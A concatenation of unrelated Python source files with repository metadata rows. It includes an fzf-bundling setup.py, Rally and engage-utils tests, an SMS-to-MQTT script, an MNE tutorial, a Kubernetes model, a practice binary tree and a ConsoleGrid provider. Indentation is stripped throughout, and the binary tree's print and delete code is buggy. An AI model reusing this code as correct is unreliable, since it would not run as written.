path = os.path.join(os.path.dirname(__file__), 'README.rst')
try:
with open(path) as f:
return f.read()
except IOError:
pass
def get_fzf_release(access_token=None):
filename = 'fzf-{0}-release.json'.format(fzf_version)
filepath = os.path.join(os.path.dirname(__file__), filename)
try:
with open(filepath) as f:
d = f.read()
except IOError:
if access_token:
request = urllib2.Request(
release_url,
headers={'Authorization': 'token ' + access_token},
)
else:
request = release_url
try:
r = urllib2.urlopen(request)
except urllib2.HTTPError as e:
if e.code == 403 and e.info().get('X-RateLimit-Remaining') == 0:
raise RuntimeError(
'GitHub rate limit reached. To increate the limit use '
'-g/--github-access-token option.\n ' + str(e)
)
elif e.code == 401 and access_token:
raise RuntimeError('Invalid GitHub access token.')
raise
d = r.read()
r.close()
mode = 'w' + ('b' if isinstance(d, bytes) else '')
try:
with open(filename, mode) as f:
f.write(d)
except IOError:
pass
try:
return json.loads(d)
except TypeError:
return json.loads(d.decode('utf-8'))
def get_fzf_binary_url(plat, arch, access_token=None):
release = get_fzf_release(access_token=access_token)
for asset in release['assets']:
m = asset_filename_re.match(asset['name'])
if not m:
warnings.warn('unmatched filename: ' + repr(asset['name']))
continue
elif m.group('ver') != fzf_version:
warnings.warn('unmatched version: ' + repr(asset['name']))
continue
elif m.group('plat') == plat and m.group('arch') == arch:
return asset['browser_download_url'], m.group('ext')
def extract(stream, ext, extract_to):
with tempfile.NamedTemporaryFile() as tmp:
shutil.copyfileobj(stream, tmp)
tmp.flush()
tmp.seek(0)
if ext == 'zip':
z = zipfile.ZipFile(tmp, 'r')
try:
info, = z.infolist()
with open(extract_to, 'wb') as f:
f.write(z.read(info))
finally:
z.close()
elif ext == 'tgz' or ext.startswith('tar.'):
tar = tarfile.open(fileobj=tmp)
try:
member, = [m for m in tar.getmembers() if m.isfile()]
rf = tar.extractfile(member)
with open(extract_to, 'wb') as wf:
shutil.copyfileobj(rf, wf)
finally:
tar.close()
else:
raise ValueError('unsupported file format: ' + repr(ext))
def download_fzf_binary(plat, arch, overwrite=False, access_token=None):
bin_path = fzf_windows_bin_path if plat == 'windows' else fzf_bin_path
if overwrite or not os.path.isfile(bin_path):
asset = get_fzf_binary_url(plat, arch, access_token)
url, ext = asset
if access_token:
url = '{0}?access_token={1}'.format(url, access_token)
try:
r = urllib2.urlopen(url)
except urllib2.HTTPError as e:
if e.code == 403 and e.info().get('X-RateLimit-Remaining') == 0:
raise RuntimeError(
'GitHub rate limit reached. To increate the limit use '
'-g/--github-access-token option.\n ' + str(e)
)
elif e.code == 401 and access_token:
raise RuntimeError('Invalid GitHub access token.')
raise
extract(r, ext, bin_path)
r.close()
mode = os.stat(bin_path).st_mode
if not (mode & 0o111):
os.chmod(bin_path, mode | 0o111)
def get_current_plat_arch():
archs = {
'i686': '386', 'i386': '386',
'x86_64': 'amd64', 'amd64': 'amd64',
}
machine = platform.machine()
if not machine and sys.platform in ('win32', 'cygwin'):
bits, linkage = platform.architecture()
try:
machine = {'32bit': 'i386', '64bit': 'amd64'}[bits]
except KeyError:
raise ValueError('unsupported architecture: ' +
repr((bits, linkage)))
machine = machine.lower()
if sys.platform.startswith('linux'):
archs.update(
armv5l='arm5', armv6l='arm6', armv7l='arm7', armv8l='arm8',
)
try:
arch = archs[machine]
except KeyError:
raise ValueError('unsupported machine: ' + repr(machine))
if sys.platform.startswith('linux'):
return 'linux', arch
elif sys.platform.startswith('freebsd'):
return 'freebsd', arch
elif sys.platform.startswith('openbsd'):
return 'freebsd', arch
elif sys.platform == 'darwin':
return 'darwin', arch
elif sys.platform in ('win32', 'cygwin'):
return 'windows', arch
else:
raise ValueError('unsupported platform: ' + repr(sys.platform))
class bundle_fzf(distutils.core.Command):
description = 'download and bundle a fzf binary'
user_options = [
('plat=', 'p', 'platform e.g. windows, linux, freebsd, darwin'),
('arch=', 'a', 'architecture e.g. 386, amd64, arm8'),
('no-overwrite', 'O', 'do not overwrite if fzf binary exists'),
(
'github-access-token=', 'g',
'GitHub API access token to increate the rate limit',
),
]
boolean_options = ['no-overwrite']
def initialize_options(self):
try:
self.plat, self.arch = get_current_plat_arch()
except ValueError:
self.plat = None
self.arch = None
self.no_overwrite = None
self.github_access_token = None
self.plat_name = None
def finalize_options(self):
if self.plat is None:
raise distutils.errors.DistutilsOptionError(
'-p/--plat option is required but missing'
)
if self.arch is None:
raise distutils.errors.DistutilsOptionError(
'-a/--arch option is required but missing'
)
try:
self.plat_name = self.get_plat_name()
except ValueError as e:
raise distutils.errors.DistutilsOptionError(str(e))
distutils.log.info('plat_name: %s', self.plat_name)
def get_plat_name(self, plat=None, arch=None):
plat = plat or self.plat
arch = arch or self.arch
if plat == 'linux':
arch_tags = {
'386': 'i686', 'amd64': 'x86_64',
'arm5': 'armv5l', 'arm6': 'armv6l',
'arm7': 'armv7l', 'arm8': 'armv8l',
}
try:
arch_tag = arch_tags[arch]
except KeyError:
raise ValueError('unsupported arch: ' + repr(arch))
return 'manylinux1_' + arch_tag
elif plat in ('freebsd', 'openbsd'):
arch_tags = {'386': 'i386', 'amd64': 'amd64'}
try:
arch_tag = arch_tags[arch]
except KeyError:
raise ValueError('unsupported arch: ' + repr(arch))
return '{0}_{1}'.format(plat, arch_tag)
elif plat == 'darwin':
if arch == '386':
archs = 'i386',
elif arch == 'amd64':
archs = 'intel', 'x86_64'
else:
raise ValueError('unsupported arch: ' + repr(arch))
macs = 10, 11, 12
return '.'.join('macosx_10_{0}_{1}'.format(mac, arch)
for mac in macs for arch in archs)
elif plat == 'windows':
if arch == '386':
return 'win32'
elif arch == 'amd64':
return 'win_amd64'
else:
raise ValueError('unsupported arch: ' + repr(arch))
else:
raise ValueError('unsupported plat: ' + repr(plat))
def run(self):
dist = self.distribution
try:
bdist_wheel = dist.command_options['bdist_wheel']
except KeyError:
self.warn(
'this comamnd is intended to be used together with bdist_wheel'
' (e.g. "{0} {1} bdist_wheel")'.format(
dist.script_name, ' '.join(dist.script_args)
)
)
else:
typename = type(self).__name__
bdist_wheel.setdefault('universal', (typename, True))
plat_name = self.plat_name
bdist_wheel.setdefault('plat_name', (typename, plat_name))
bdist_wheel_cls = dist.cmdclass['bdist_wheel']
get_tag_orig = bdist_wheel_cls.get_tag
def get_tag(self): # monkeypatch bdist_wheel.get_tag()
if self.plat_name_supplied and self.plat_name == plat_name:
return get_tag_orig(self)[:2] + (plat_name,)
return get_tag_orig(self)
bdist_wheel_cls.get_tag = get_tag
download_fzf_binary(self.plat, self.arch,
overwrite=not self.no_overwrite,
access_token=self.github_access_token)
if dist.package_data is None:
dist.package_data = {}
dist.package_data.setdefault('iterfzf', []).append(
'fzf.exe' if self.plat == 'windows' else 'fzf'
)
setup(
name='iterfzf',
version=version,
description='Pythonic interface to fzf',
long_description=readme(),
url='https://github.com/dahlia/iterfzf',
author='Hong Minhee',
author_email='hong.minhee' '@' 'gmail.com',
license='GPLv3 or later',
packages=['iterfzf'],
package_data={'iterfzf': ['py.typed']},
cmdclass={'bundle_fzf': bundle_fzf},
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4',
install_requires=['setuptools'],
zip_safe=False,
include_package_data=True,
download_url='https://github.com/dahlia/iterfzf/releases',
keywords='fzf',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console :: Curses',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)', # noqa: E501
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: BSD :: OpenBSD',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Terminals',
]
)
|
gpl-3.0
| 289,778,294,269,218,750 | 34.535503 | 99 | 0.53784 | false |
amit0701/rally
|
tests/unit/task/processing/test_plot.py
|
1
|
6543
|
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import ddt
import mock
from rally.task.processing import plot
from tests.unit import test
PLOT = "rally.task.processing.plot."
@ddt.ddt
class PlotTestCase(test.TestCase):
@mock.patch(PLOT + "charts")
def test__process_scenario(self, mock_charts):
for mock_ins, ret in [
(mock_charts.MainStatsTable, "main_stats"),
(mock_charts.MainStackedAreaChart, "main_stacked"),
(mock_charts.AtomicStackedAreaChart, "atomic_stacked"),
(mock_charts.OutputStackedAreaDeprecatedChart,
"output_stacked"),
(mock_charts.LoadProfileChart, "load_profile"),
(mock_charts.MainHistogramChart, "main_histogram"),
(mock_charts.AtomicHistogramChart, "atomic_histogram"),
(mock_charts.AtomicAvgChart, "atomic_avg")]:
setattr(mock_ins.return_value.render, "return_value", ret)
iterations = [
{"timestamp": i + 2, "error": [],
"duration": i + 5, "idle_duration": i,
"output": {"additive": [], "complete": []},
"atomic_actions": {"foo_action": i + 10}} for i in range(10)]
data = {"iterations": iterations, "sla": [],
"key": {"kw": {"runner": {"type": "constant"}},
"name": "Foo.bar", "pos": 0},
"info": {"atomic": {"foo_action": {"max_duration": 19,
"min_duration": 10}},
"full_duration": 40, "load_duration": 32,
"iterations_count": 10, "iterations_passed": 10,
"max_duration": 14, "min_duration": 5,
"output_names": [],
"tstamp_end": 25, "tstamp_start": 2}}
task_data = plot._process_scenario(data, 1)
self.assertEqual(
task_data, {
"cls": "Foo", "met": "bar", "name": "bar [2]", "pos": "1",
"runner": "constant", "config": json.dumps(
{"Foo.bar": [{"runner": {"type": "constant"}}]},
indent=2),
"full_duration": 40, "load_duration": 32,
"atomic": {"histogram": "atomic_histogram",
"iter": "atomic_stacked", "pie": "atomic_avg"},
"iterations": {"histogram": "main_histogram",
"iter": "main_stacked",
"pie": [("success", 10), ("errors", 0)]},
"iterations_count": 10, "errors": [],
"load_profile": "load_profile",
"additive_output": [],
"complete_output": [[], [], [], [], [], [], [], [], [], []],
"output_errors": [],
"sla": [], "sla_success": True, "table": "main_stats"})
@mock.patch(PLOT + "_process_scenario")
@mock.patch(PLOT + "json.dumps", return_value="json_data")
def test__process_tasks(self, mock_json_dumps, mock__process_scenario):
tasks_results = [{"key": {"name": i, "kw": "kw_" + i}}
for i in ("a", "b", "c", "b")]
mock__process_scenario.side_effect = lambda a, b: (
{"cls": "%s_cls" % a["key"]["name"],
"name": str(b),
"met": "dummy",
"pos": str(b)})
source, tasks = plot._process_tasks(tasks_results)
self.assertEqual(source, "json_data")
mock_json_dumps.assert_called_once_with(
{"a": ["kw_a"], "b": ["kw_b", "kw_b"], "c": ["kw_c"]},
sort_keys=True, indent=2)
self.assertEqual(
tasks,
[{"cls": "a_cls", "met": "dummy", "name": "0", "pos": "0"},
{"cls": "b_cls", "met": "dummy", "name": "0", "pos": "0"},
{"cls": "b_cls", "met": "dummy", "name": "1", "pos": "1"},
{"cls": "c_cls", "met": "dummy", "name": "0", "pos": "0"}])
@ddt.data({},
{"include_libs": True},
{"include_libs": False})
@ddt.unpack
@mock.patch(PLOT + "_process_tasks")
@mock.patch(PLOT + "objects")
@mock.patch(PLOT + "ui_utils.get_template")
@mock.patch(PLOT + "json.dumps", side_effect=lambda s: "json_" + s)
def test_plot(self, mock_dumps, mock_get_template, mock_objects,
mock__process_tasks, **ddt_kwargs):
mock__process_tasks.return_value = "source", "scenarios"
mock_get_template.return_value.render.return_value = "tasks_html"
mock_objects.Task.extend_results.return_value = ["extended_result"]
tasks_results = [
{"key": "foo_key", "sla": "foo_sla", "result": "foo_result",
"full_duration": "foo_full_duration",
"load_duration": "foo_load_duration"}]
html = plot.plot(tasks_results, **ddt_kwargs)
self.assertEqual(html, "tasks_html")
generic_results = [
{"id": None, "created_at": None, "updated_at": None,
"task_uuid": None, "key": "foo_key",
"data": {"raw": "foo_result",
"full_duration": "foo_full_duration",
"sla": "foo_sla",
"load_duration": "foo_load_duration"}}]
mock_objects.Task.extend_results.assert_called_once_with(
generic_results)
mock_get_template.assert_called_once_with("task/report.html")
mock__process_tasks.assert_called_once_with(["extended_result"])
if "include_libs" in ddt_kwargs:
mock_get_template.return_value.render.assert_called_once_with(
data="json_scenarios", source="json_source",
include_libs=ddt_kwargs["include_libs"])
else:
mock_get_template.return_value.render.assert_called_once_with(
data="json_scenarios", source="json_source",
include_libs=False)
|
apache-2.0
| 5,324,407,977,765,640,000 | 46.413043 | 78 | 0.517041 | false |
autostock/RaspiDay
|
day2/SIM-Card/raspberry-code/sim-mqtt.py
|
1
|
1294
|
# leitet SMS-Nachricht an MQTT-Broker weiter
# SIM-Modul an ttyS1
# Ansteuerung mit AT-Befehlen
# SMS-Format topic:payload
# initpin() einmal zu Beginn
import serial
import time
import paho.mqtt.client as mqtt
port=serial.Serial("/dev/ttyS1",9600)
#port.open()
client=mqtt.Client()
# MQTT-Server
client.connect("x.x.x.x",1883,60)
def initpin():
# SIM-PIN
port.write("AT+CPIN=xxxx\r\n")
out=''
time.sleep(0.5)
while port.inWaiting()>0:
out+=port.read(1)
print out
def readmsg1():
port.write("AT+CMGR=1\r\n")
out=''
time.sleep(0.5)
while port.inWaiting()>0:
out+=port.read(1)
if len(out)<7:
print "keine Nachricht."
else:
print out
nrstart=out.find('"+')
nrend=out.find('"',nrstart+1)
nr=out[nrstart+1:nrend]
endline=out.find('\n',2)
mess=out[endline+1:]
endmess=mess.find('\n')-1
mess=mess[:endmess]
# erlaubte Nummer
if nr != "xxxxxxxxxxxxxx":
print "ungueltige Nummer."
else:
print "Signal erhalten."
# print "Message:"+mess
endtopic=mess.find(':')
topic=mess[:endtopic]
payload=mess[endtopic+1:]
# print "Topic:"+topic
# print "Payload:"+payload
client.publish(topic,payload)
port.write('AT+CMGD=1\r\n')
while(1):
readmsg1()
time.sleep(10)
port.close()
|
gpl-3.0
| -3,823,492,392,637,159,400 | 20.213115 | 44 | 0.637558 | false |
mne-tools/mne-tools.github.io
|
0.15/_downloads/plot_object_evoked.py
|
2
|
3497
|
"""
.. _tut_evoked_objects:
The :class:`Evoked <mne.Evoked>` data structure: evoked/averaged data
=====================================================================
The :class:`Evoked <mne.Evoked>` data structure is mainly used for storing
averaged data over trials. In MNE the evoked objects are usually created by
averaging epochs data with :func:`mne.Epochs.average`.
"""
import os.path as op
import mne
###############################################################################
# Here for convenience we read the evoked dataset from a file.
data_path = mne.datasets.sample.data_path()
fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis-ave.fif')
evokeds = mne.read_evokeds(fname, baseline=(None, 0), proj=True)
print(evokeds)
###############################################################################
# Notice that the reader function returned a list of evoked instances. This is
# because you can store multiple categories into a single file. Here we have
# categories of
# ``['Left Auditory', 'Right Auditory', 'Left Visual', 'Right Visual']``.
# We can also use ``condition`` parameter to read in only one category.
evoked = mne.read_evokeds(fname, condition='Left Auditory')
evoked.apply_baseline((None, 0)).apply_proj()
print(evoked)
###############################################################################
# If you're gone through the tutorials of raw and epochs datasets, you're
# probably already familiar with the :class:`Info <mne.Info>` attribute.
# There is nothing new or special with the ``evoked.info``. All the relevant
# info is still there.
print(evoked.info)
print(evoked.times)
###############################################################################
# The evoked data structure also contains some new attributes easily
# accessible:
print(evoked.nave) # Number of averaged epochs.
print(evoked.first) # First time sample.
print(evoked.last) # Last time sample.
print(evoked.comment) # Comment on dataset. Usually the condition.
print(evoked.kind) # Type of data, either average or standard_error.
###############################################################################
# The data is also easily accessible. Since the evoked data arrays are usually
# much smaller than raw or epochs datasets, they are preloaded into the memory
# when the evoked object is constructed. You can access the data as a numpy
# array.
data = evoked.data
print(data.shape)
###############################################################################
# The data is arranged in an array of shape `(n_channels, n_times)`. Notice
# that unlike epochs, evoked object does not support indexing. This means that
# to access the data of a specific channel you must use the data array
# directly.
print('Data from channel {0}:'.format(evoked.ch_names[10]))
print(data[10])
###############################################################################
# If you want to import evoked data from some other system and you have it in a
# numpy array you can use :class:`mne.EvokedArray` for that. All you need is
# the data and some info about the evoked data. For more information, see
# :ref:`tut_creating_data_structures`.
evoked = mne.EvokedArray(data, evoked.info, tmin=evoked.times[0])
evoked.plot()
###############################################################################
# To write an evoked dataset to a file, use the :meth:`mne.Evoked.save` method.
# To save multiple categories to a single file, see :func:`mne.write_evokeds`.
|
bsd-3-clause
| -5,153,579,084,988,538,000 | 45.013158 | 79 | 0.596797 | false |
quaddra/engage-utils
|
engage_utils/test_pkgmgr.py
|
1
|
2787
|
"""Unit tests for pkgmgr
Just import this package into the python repl. We can eventually
convert this to unit tests.
You can allow run from the command line:
python -c "from test_pkgmgr import *"
"""
DRY_RUN=False
import logging
logging.basicConfig(level=logging.DEBUG)
import tempfile
import shutil
from pkgmgr import *
pkgs = []
django_pkg_js = {
"filename": "Django-1.4.10.tar.gz",
"name": "Django",
"version":"1.4",
"pkg_type":"pip",
"package_name": "django==1.4.10",
"license": {"name":"BSD 3-Clause",
"url":"https://github.com/django/django/blob/master/LICENSE"},
"patch_version":"1.4.10",
"md5sum": "d324aecc37ce5430f548653b8b1509b6",
"cksum": "1774032669"
}
django = Package.from_json(django_pkg_js)
pkgs.append(django)
print django.pretty_print()
pip_pkg_js = {
"filename": "pip-1.5.2.tar.gz",
"name": "pip",
"version": "1.5",
"patch_version":"1.5.2",
"pkg_type": "tgz",
"source_url": "https://pypi.python.org/packages/source/p/pip/pip-1.5.2.tar.gz#md5=5da30919f732d68b1c666e484e7676f5",
"md5sum":"5da30919f732d68b1c666e484e7676f5",
"license": {"name":"MIT",
"url":"https://github.com/pypa/pip/blob/develop/LICENSE.txt"}
}
pip = Package.from_json(pip_pkg_js)
pkgs.append(pip)
print pip.pretty_print()
tmpdir = tempfile.mkdtemp()
print "Creating %s for tests" % tmpdir
tmpdir2 = None
try:
print "Initial downloads"
for p in pkgs:
print "Initial download of %s" % p.filename
p.download_from_source(tmpdir, dry_run=DRY_RUN)
print "Will download everything again, should skip all files"
for p in pkgs:
print "Re-download %s" % p.filename
path = p.download([], tmpdir, dry_run=DRY_RUN)
assert os.path.exists(path)
tmpdir2 = tempfile.mkdtemp()
print "Secondary repository at %s" % tmpdir2
repo = 'file:' + tmpdir
print '"Download" from local repository %s' % repo
for p in pkgs:
path = p.download([repo,], tmpdir2, dry_run=DRY_RUN)
assert os.path.exists(path)
# test the gathering of packages
engage_dir = fixpath(os.path.join(os.path.dirname(fixpath(__file__)),
'../../engage'))
if not os.path.exists(engage_dir):
raise Exception("Could not run gather test - no engage directory at %s" % engage_dir)
package_file = os.path.join(tmpdir2, 'packages.json')
print "gathering resource files from %s" % engage_dir
cnt = gather_package_definitions([engage_dir,], package_file)
assert cnt==1, "Expecting 1 packages, got %d" % cnt
finally:
shutil.rmtree(tmpdir)
print "deleted %s" % tmpdir
if tmpdir2:
shutil.rmtree(tmpdir2)
print "deleted %s" % tmpdir2
print "all tests passed"
|
apache-2.0
| -4,386,750,700,094,869,500 | 30.670455 | 120 | 0.639756 | false |
mbohlool/client-python
|
kubernetes/client/models/v1_glusterfs_volume_source.py
|
1
|
5563
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1GlusterfsVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'endpoints': 'str',
'path': 'str',
'read_only': 'bool'
}
attribute_map = {
'endpoints': 'endpoints',
'path': 'path',
'read_only': 'readOnly'
}
def __init__(self, endpoints=None, path=None, read_only=None):
"""
V1GlusterfsVolumeSource - a model defined in Swagger
"""
self._endpoints = None
self._path = None
self._read_only = None
self.discriminator = None
self.endpoints = endpoints
self.path = path
if read_only is not None:
self.read_only = read_only
@property
def endpoints(self):
"""
Gets the endpoints of this V1GlusterfsVolumeSource.
EndpointsName is the endpoint name that details Glusterfs topology. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:return: The endpoints of this V1GlusterfsVolumeSource.
:rtype: str
"""
return self._endpoints
@endpoints.setter
def endpoints(self, endpoints):
"""
Sets the endpoints of this V1GlusterfsVolumeSource.
EndpointsName is the endpoint name that details Glusterfs topology. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:param endpoints: The endpoints of this V1GlusterfsVolumeSource.
:type: str
"""
if endpoints is None:
raise ValueError("Invalid value for `endpoints`, must not be `None`")
self._endpoints = endpoints
@property
def path(self):
"""
Gets the path of this V1GlusterfsVolumeSource.
Path is the Glusterfs volume path. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:return: The path of this V1GlusterfsVolumeSource.
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""
Sets the path of this V1GlusterfsVolumeSource.
Path is the Glusterfs volume path. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:param path: The path of this V1GlusterfsVolumeSource.
:type: str
"""
if path is None:
raise ValueError("Invalid value for `path`, must not be `None`")
self._path = path
@property
def read_only(self):
"""
Gets the read_only of this V1GlusterfsVolumeSource.
ReadOnly here will force the Glusterfs volume to be mounted with read-only permissions. Defaults to false. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:return: The read_only of this V1GlusterfsVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1GlusterfsVolumeSource.
ReadOnly here will force the Glusterfs volume to be mounted with read-only permissions. Defaults to false. More info: https://releases.k8s.io/HEAD/examples/volumes/glusterfs/README.md#create-a-pod
:param read_only: The read_only of this V1GlusterfsVolumeSource.
:type: bool
"""
self._read_only = read_only
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1GlusterfsVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
apache-2.0
| -5,037,618,386,105,305,000 | 29.233696 | 204 | 0.586015 | false |
MisterTofu/practice
|
datastructures/binary-tree.py
|
1
|
5688
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: Travis A. Ebesu
@created: 2015-02-22
@summary:
'''
# pylint: disable=all
class Node(object):
def __init__(self, key):
self.key = key
self.left = None
self.right = None
self.parent = None
def __str__(self):
return '{0}'.format(self.key)
def __repr__(self):
return 'Key: {0:<5}\tParent: {1:<5}\tLeft: {2:<5}\tRight: {3:<5}'.format(self.key,
self.parent,
self.left,
self.right)
def _search(node, key):
'''
Searches the binary tree for a key
Directs it left if smaller and right if bigger
Iterative is faster than recursive
'''
temp = node
prev = temp
while temp != None or temp != None and key != temp.key:
if key < temp.key:
prev = temp
temp = temp.left
else:
prev = temp
temp = temp.right
if key == prev.key:
return prev
else:
return None
def _print_helper(root, indent):
'''
@source: http://www.cs.toronto.edu/~rdanek/csc148h_09/lectures/8/bst.py
Print the tree rooted at BTNode root. Print str indent (which
consists only of whitespace) before the root value; indent more for the
subtrees so that it looks nice.'''
if root is not None:
print_helper(root.right, indent + " ")
print indent + str(root.key)
print_helper(root.left, indent + " ")
class BinaryTree(object):
def __init__(self):
self.root = None
self.size = 0
def __len__(self):
return self.size
@property
def length(self):
return self.size
def max(self, node=None):
'''
Returns the maximum value in the tree
'''
temp = self.root if node == None else node
while temp.right != None:
temp = temp.right
return temp
def min(self, node=None):
'''
Returns the min value in the tree
'''
temp = self.root if node == None else node
while temp.left != None:
temp = temp.left
return temp
def __transplant(self, u, v):
# Replace U with V
# u is the root
if u.parent == None:
self.root = v
# u is a left child
elif u.key == u.parent.left.key:
u.parent.left = v
# u is a right child
else:
u.parent.right = v
if v != None:
v.parent = u.parent
def __delete_node(self, node):
'''
Deletes a node
'''
# No left element
if node.left == None:
self.__transplant(node, node.right)
# No right element
elif node.right == None:
self.__transplant(node, node.left)
else:
temp = self.min(node)
if temp.parent != node:
self.__transplant(temp, temp.right)
temp.right = node.right
temp.right.parent = temp
self.__transplant(node, temp)
temp.left = node.left
temp.left.parent = node
def delete(self, key):
'''
Deletes a node given a key
'''
node = self.search(key)
if node != None:
self.__delete_node(node)
self.size -= 1
else:
raise KeyError('No such node exists in tree')
def insert(self, key):
'''
Inserts a node, left if key < parent else right
Left has smaller, right has bigger
'''
self.size += 1
node = Node(key)
cur = None
parent = self.root
while parent is not None:
cur = parent
parent = parent.left if node.key < parent.key else parent.right
node.parent = cur
if cur is None:
self.root = node
elif node.key < cur.key:
cur.left = node
else:
cur.right = node
def search(self, key):
'''
Searches for a given element in the tree
'''
return _search(self.root, key)
def __inorder_tree_walk(self, node):
'''
prints out the elements in order
'''
if node != None:
self.__inorder_tree_walk(node.left)
print node.key
self.__inorder_tree_walk(node.right)
def __str__(self):
'''
Prints the tree out by depth
'''
s = dict()
depth = 0
def recursive(node, depth):
if node != None:
recursive(node.left, depth + 1)
temp = s.get(depth, None)
if temp:
temp.append(node.key)
else:
temp = [node.key]
s[depth] = temp
recursive(node.right, depth + 1)
recursive(self.root, 1)
output = []
for depth in sorted(s.keys()):
layer = ''
for v in s[depth]:
layer += '{0}{1}'.format(' ' * depth, v)
output.append(layer)
return '\n'.join(output)
def print_tree(self):
'''
source = http://www.cs.toronto.edu/~rdanek/csc148h_09/lectures/8/bst.py
Print the tree rooted at root.'''
_print_helper(self.root, "")
if __name__ == '__main__':
print
bt = BinaryTree()
bt.insert(10)
bt.insert(5)
bt.insert(3)
bt.insert(20)
bt.delete(5)
bt.print_tree()
|
gpl-3.0
| -1,501,138,086,404,303,600 | 24.621622 | 90 | 0.483122 | false |
scottrice/Ice
|
ice/gridproviders/consolegrid_provider.py
|
1
|
1816
|
#!/usr/bin/env python
# encoding: utf-8
"""
consolegrid_provider.py
Created by Scott on 2013-12-26.
Copyright (c) 2013 Scott Rice. All rights reserved.
"""
import sys
import os
import urllib
import urllib2
import grid_image_provider
from ice.logs import logger
class ConsoleGridProvider(grid_image_provider.GridImageProvider):
@staticmethod
def api_url():
return "http://consolegrid.com/api/top_picture"
@staticmethod
def is_enabled():
# TODO: Return True/False based on the current network status
return True
def consolegrid_top_picture_url(self, rom):
host = self.api_url()
quoted_name = urllib.quote(rom.name)
return "%s?console=%s&game=%s" % (host, rom.console.shortname, quoted_name)
def find_url_for_rom(self, rom):
"""
Determines a suitable grid image for a given ROM by hitting
ConsoleGrid.com
"""
try:
response = urllib2.urlopen(self.consolegrid_top_picture_url(rom))
if response.getcode() == 204:
name = rom.name
console = rom.console.fullname
logger.debug(
"ConsoleGrid has no game called `%s` for %s" % (name, console)
)
else:
return response.read()
except urllib2.URLError as error:
# Connection was refused. ConsoleGrid may be down, or something bad
# may have happened
logger.debug(
"No image was downloaded due to an error with ConsoleGrid"
)
def download_image(self, url):
"""
Downloads the image at 'url' and returns the path to the image on the
local filesystem
"""
(path, headers) = urllib.urlretrieve(url)
return path
def image_for_rom(self, rom):
image_url = self.find_url_for_rom(rom)
if image_url is None or image_url == "":
return None
return self.download_image(image_url)
|
mit
| 8,985,641,121,252,052,000 | 25.318841 | 79 | 0.663546 | false |
wcmitchell/insights-core
|
insights/parsers/brctl_show.py
|
1
|
4185
|
"""
BrctlShow - command ``brctl show``
==================================
This module provides processing for the output of the ``brctl show`` command.
Class ``BrctlShow`` parses the output of the ``brctl show`` command.
Sample output of this command looks like::
---
bridge name bridge id STP enabled interfaces
br0 8000.08002731ddfd no eth1
eth2
eth3
br1 8000.0800278cdb62 no eth4
eth5
br2 8000.0800278cdb63 no eth6
docker0 8000.0242d4cf2112 no
---
Examples:
>>> brctl_content = '''
... bridge name bridge id STP enabled interfaces
... br0 8000.08002731ddfd no eth1
... eth2
... eth3
... br1 8000.0800278cdb62 no eth4
... eth5
... br2 8000.0800278cdb63 no eth6
... docker0 8000.0242d4cf2112 no
... '''.strip()
>>> from insights.parsers.brctl_show import BrctlShow
>>> from insights.tests import context_wrap
>>> shared = {BrctlShow: BrctlShow(context_wrap(brctl_content))}
>>> brctl_info = BrctlShow(context_wrap(brctl_content))
>>> brctl_info.data
[
{'interfaces': ['eth1', 'eth2', 'eth3'], 'bridge id': '8000.08002731ddfd',
'STP enabled': 'no', 'bridge name': 'br0'},
{'interfaces': ['eth4', 'eth5'], 'bridge id': '8000.0800278cdb62',
'STP enabled': 'no', 'bridge name': 'br1'},
{'interfaces': ['eth6'], 'bridge id': '8000.0800278cdb63',
'STP enabled': 'no', 'bridge name': 'br2'},
